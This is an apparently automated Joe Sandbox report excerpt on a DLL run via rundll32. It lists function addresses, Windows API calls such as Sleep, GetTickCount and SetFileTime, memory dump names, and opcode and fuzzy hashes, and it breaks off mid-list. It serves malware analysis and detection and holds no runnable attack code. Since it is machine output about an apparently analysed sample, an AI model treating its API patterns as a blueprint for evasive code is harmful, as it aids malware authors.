                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000,?,00000000,?,6C7CF9B4,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000), ref: 6C7C601E
                    • Sleep.KERNEL32(0000000A,00000000,?,00000000,?,6C7CF9B4,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000), ref: 6C7C6038
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: eda14d31678e15c433b5dc57067b33e48b21882b23e24a4f842a87c284776c97
                    • Instruction ID: 4a11ff699402e1e4b79fbe227a1ba2f541035c54c3402bb1390fa3f6465090d2
                    • Opcode Fuzzy Hash: eda14d31678e15c433b5dc57067b33e48b21882b23e24a4f842a87c284776c97
                    • Instruction Fuzzy Hash: 627124713443028FE741CB29DAC8B6ABBE5AF86318F18827AD544CBBC1D7719984C753
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C6180 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 703d639cb2a32a2c6da4affd92b3c4ee3fb3ee417151c2d5d04341219375dfbc
                    • Instruction ID: f2c5e0198c3a1b731bd94b34d50d29ae6638226b3bc0050a8b946f17ed47c2a2
                    • Opcode Fuzzy Hash: 703d639cb2a32a2c6da4affd92b3c4ee3fb3ee417151c2d5d04341219375dfbc
                    • Instruction Fuzzy Hash: 2CC138627116020FE7048A7CEEC87AEB696DBC5325F58823DE214CBBC6DB75CA459343
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C9A54 Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 6C7C9F14: GetCurrentThreadId.KERNEL32 ref: 6C7C9F17
                    • GetTickCount.KERNEL32 ref: 6C7C9A8B
                    • GetTickCount.KERNEL32 ref: 6C7C9AA3
                    • GetCurrentThreadId.KERNEL32 ref: 6C7C9AD2
                    • GetTickCount.KERNEL32 ref: 6C7C9AFD
                    • GetTickCount.KERNEL32 ref: 6C7C9B34
                    • GetTickCount.KERNEL32 ref: 6C7C9B5E
                    • GetCurrentThreadId.KERNEL32 ref: 6C7C9BCE
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CountTick$CurrentThread
                    • String ID:
                    • API String ID: 3968769311-0
                    • Opcode ID: f72f4ba9399737d57ce720c2c029aba8bea3a9cdbdb9b69ea7c213746d95bec7
                    • Instruction ID: 20f7e26630e93b6fe0db7ba7fa2dec3b29f3c2915e1b466aa6237a4a76a7027a
                    • Opcode Fuzzy Hash: f72f4ba9399737d57ce720c2c029aba8bea3a9cdbdb9b69ea7c213746d95bec7
                    • Instruction Fuzzy Hash: A3416A31309347AED7919E78C68434EBAD1ABB135CF148A3CD4E887A85EB759484C753
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CAB24 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,6C7CABDC,00000000,?,00000000,6C7CACF6,6C7CAD10,?,?,6C7D2490), ref: 6C7CAB5D
                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,6C7CABDC,00000000,?,00000000,6C7CACF6,6C7CAD10,?,?,6C7D2490), ref: 6C7CAB63
                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,6C7CABDC,00000000,?,00000000), ref: 6C7CAB7E
                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,6C7CABDC,00000000,?), ref: 6C7CAB84
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileHandleWrite
                    • String ID: Error$Runtime error at 00000000
                    • API String ID: 3320372497-2970929446
                    • Opcode ID: bb66ea7f00c140ba9e2e3ed0481c52dd24381d18047ceabfabf366ff84e5c2be
                    • Instruction ID: 73e9d0f992444bfcd6228e0a25f0c6fb80bcfe4b46e7cded037478c2a0a34721
                    • Opcode Fuzzy Hash: bb66ea7f00c140ba9e2e3ed0481c52dd24381d18047ceabfabf366ff84e5c2be
                    • Instruction Fuzzy Hash: 47F0F65170424ABDFA009B644E4EF9A772C1762B2DF544615B330A8DD1C7A14488A323
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C8F9C04 Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    • GetSystemMetrics.USER32(0000000B), ref: 6C8F9C5C
                    • GetSystemMetrics.USER32(0000000C), ref: 6C8F9C68
                    • GetDC.USER32(00000000), ref: 6C8F9C84
                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 6C8F9CAB
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 6C8F9CB8
                    • ReleaseDC.USER32(00000000,00000000), ref: 6C8F9CF1
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CapsDeviceMetricsSystem$Release
                    • String ID:
                    • API String ID: 447804332-0
                    • Opcode ID: ba610b215232a23ddf012c74d5d5ebc76487911ce677762d6f1277b240450a4b
                    • Instruction ID: 49ba815ec0455578e71595b229dbab3d1f6ce13ae5e479736c9d26958fa56883
                    • Opcode Fuzzy Hash: ba610b215232a23ddf012c74d5d5ebc76487911ce677762d6f1277b240450a4b
                    • Instruction Fuzzy Hash: 4B319174A00208EFDB11CFA9CA94ADEBBF5FF89354F118965E818EB754C730A941CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C5C04 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000,?,6C7CF9D1,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000,?,6C7CFCB6,00000000), ref: 6C7C5CBB
                    • Sleep.KERNEL32(0000000A,00000000,?,6C7CF9D1,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000,?,6C7CFCB6), ref: 6C7C5CD1
                    • Sleep.KERNEL32(00000000,?,?,?,6C7CF9D1,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000), ref: 6C7C5CFF
                    • Sleep.KERNEL32(0000000A,00000000,?,?,?,6C7CF9D1,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000), ref: 6C7C5D15
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: c1709a7b4cadb47258954d6763112cf34fde56090073c7249d2452ad6ff26ca0
                    • Instruction ID: 3ad47697c7567809d0d2c5fc4ed53e3fdf55c7785e0609ed8d820f4237a0854e
                    • Opcode Fuzzy Hash: c1709a7b4cadb47258954d6763112cf34fde56090073c7249d2452ad6ff26ca0
                    • Instruction Fuzzy Hash: 03C163767053428FEB45CF29EAC435ABBF5AB82314F58827ED1148BBC1CBB19440DB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C8DF81C Relevance: 7.6, APIs: 5, Instructions: 133filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • SetLastError.KERNEL32(00000000,00000000,6C8DF959,?,00000000,6C8DF9BD), ref: 6C8DF8F5
                    • CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000080,00000000,00000000,00000000,6C8DF959,?,00000000,6C8DF9BD), ref: 6C8DF92C
                    • SetFileTime.KERNEL32(000000FF,00000000,?,?,00000000,40000000,00000002,00000000,00000003,00000080,00000000,00000000,00000000,6C8DF959,?,00000000), ref: 6C8DF94A
                    • CloseHandle.KERNEL32(000000FF,6C8DF9C4,00000000,00000000,00000000,6C8DF959,?,00000000,6C8DF9BD), ref: 6C8DF996
                    • SetLastError.KERNEL32(00000000,000000FF,6C8DF9C4,00000000,00000000,00000000,6C8DF959,?,00000000,6C8DF9BD), ref: 6C8DF99D
                      • Part of subcall function 6C8DEF1C: TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,6C8DF959,?,?,?,?,?,?,?,?,?), ref: 6C8DEF64
                      • Part of subcall function 6C8DEF1C: SystemTimeToFileTime.KERNEL32(6C8DF959,?,?,?,?,?,?,?,?,?,?), ref: 6C8DEF7C
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Time$File$ErrorLastSystem$CloseCreateHandleLocalSpecific
                    • String ID:
                    • API String ID: 1347700184-0
                    • Opcode ID: 55e2bed3da37d1db740f77d95cb68b2bbfff43670b34887c6438c68f31b63fe7
                    • Instruction ID: e673f31821efba8ef652658724f0556d339b5fe8000cd65458ea05a2cb935753
                    • Opcode Fuzzy Hash: 55e2bed3da37d1db740f77d95cb68b2bbfff43670b34887c6438c68f31b63fe7
                    • Instruction Fuzzy Hash: 52415D75E0020AAFDB11CFA8CE44B9EBBB5EF49314F128865E914EB790D734A904DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9B1AEC Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,?,00000000,?,6C9B1CA1,?,00000000,?,00000000), ref: 6C9B1B2A
                    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,6C9B1CA1,?,00000000,?,00000000), ref: 6C9B1B5B
                    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,6C9B1CA1,?,00000000,?,00000000), ref: 6C9B1B8C
                    • FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,6C9B1CA1,?,00000000,?,00000000), ref: 6C9B1BBD
                    • FlatSB_SetScrollProp.COMCTL32(00000000,?,00000000,00000000,00000000,00000001,?,00000000,?,00000000,?,6C9B1CA1,?,00000000,?,00000000), ref: 6C9B1BEB
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FlatPropScroll
                    • String ID:
                    • API String ID: 3625857538-0
                    • Opcode ID: cf289cb58bfc07c18cfd0f11fa45ac0a9d710349b21c1d327a611ab6fd6dca60
                    • Instruction ID: 21657ea4e38bd45ea201db479c7d6ed764efe32174102b4e96be4443c2645499
                    • Opcode Fuzzy Hash: cf289cb58bfc07c18cfd0f11fa45ac0a9d710349b21c1d327a611ab6fd6dca60
                    • Instruction Fuzzy Hash: 4531C570600198AFDB60CF5CC980E6277FCAB2A308B564995F288DB762D736ED54CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7E8C60 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNEL32(00000000,?,?,00000000,6C7E8A82), ref: 6C7E8C71
                    • GetLastError.KERNEL32(00000000,?,?,00000000,6C7E8A82), ref: 6C7E8CCA
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947207235.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947230574.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947257278.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID:
                    • API String ID: 1799206407-0
                    • Opcode ID: 845c4e0a07b4209742a7abc3bb07569dfd69de78d73716a4e83f58ce514cda68
                    • Instruction ID: 5f0f7e7ea8be7b168c88806b5c3472d01257391c96b1191476f9e077530efd17
                    • Opcode Fuzzy Hash: 845c4e0a07b4209742a7abc3bb07569dfd69de78d73716a4e83f58ce514cda68
                    • Instruction Fuzzy Hash: 0E018F3338720065EA22147C0F997BD21844B8F6ACF350AA3FF64E7FF0D64664576169
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CF1B0 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 6C7CF1C1
                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 6C7CF21F
                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 6C7CF27C
                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 6C7CF2AF
                      • Part of subcall function 6C7CF16C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,6C7CF22D), ref: 6C7CF183
                      • Part of subcall function 6C7CF16C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,6C7CF22D), ref: 6C7CF1A0
                    Memory Dump Source
                    • Source File: 00000008.00000002.2946400684.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 00000008.00000002.2946372030.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2946400684.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947027627.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947047380.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947068005.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947088320.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947108975.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947134676.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947157182.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000008.00000002.2947183530.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
